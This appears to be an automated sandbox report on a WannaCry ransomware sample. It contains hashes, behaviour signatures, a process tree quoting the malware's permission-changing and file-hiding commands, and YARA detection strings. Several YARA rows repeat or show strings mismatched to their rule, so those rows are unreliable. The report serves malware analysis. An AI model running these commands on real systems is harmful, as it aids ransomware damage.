Edit tour

Windows Analysis Report
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Overview

General Information

Sample name:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Analysis ID:	1482655
MD5:	47ca2af9d739bf1a16d8480fd875e782
SHA1:	c2e60a77a411e93a86813a678315e65c1a4727e3
SHA256:	5064c5a2e7ead815daffd1dc3126ce6286240404f4416ce5f4f5550fa3c3a820
Tags:	exeWormRamnit
Infos:

Detection

Wannacry, Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected Wannacry Ransomware

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Yara detected Bdaejec

Yara detected Wannacry ransomware

AI detected suspicious sample

Command shell drops VBS files

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Creates files in the recycle bin to hide itself

Deletes shadow drive data (may be related to ransomware)

Drops PE files to the document folder of the user

Found Tor onion address

Found stalling execution ending in API Sleep call

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

PE file contains section with special chars

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Uses known network protocols on non-standard ports

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe (PID: 4548 cmdline: "C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe" MD5: 47CA2AF9D739BF1A16D8480FD875E782)

dllhost.exe (PID: 4256 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

wBQInv.exe (PID: 6768 cmdline: C:\Users\user~1\AppData\Local\Temp\wBQInv.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)

dllhost.exe (PID: 5464 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

svchost.exe (PID: 5340 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

attrib.exe (PID: 6976 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 484 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskdl.exe (PID: 4100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5436 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cmd.exe (PID: 7068 cmdline: C:\Windows\system32\cmd.exe /c 36751721951490.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 644 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)

taskdl.exe (PID: 1424 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4092 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6608 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5888 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5932 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4948 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7140 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2312 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1352 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6808 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4948 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1260 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

svchost.exe (PID: 5808 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6768 -ip 6768 MD5: C31336C1EFC2CCB44B4326EA793040F2)

taskdl.exe (PID: 3180 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3452 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

svchost.exe (PID: 1004 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

taskdl.exe (PID: 3020 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2044 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

Dropped Files

Source	Rule	Description	Author	Strings
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\36751721951490.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Click to see the 40 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1256386714.000000000040E000.00000008.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1797315090.0000000000960000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000002.3703395638.000000000040F000.00000004.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID: 4548	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: wBQInv.exe PID: 6768	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.raw.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
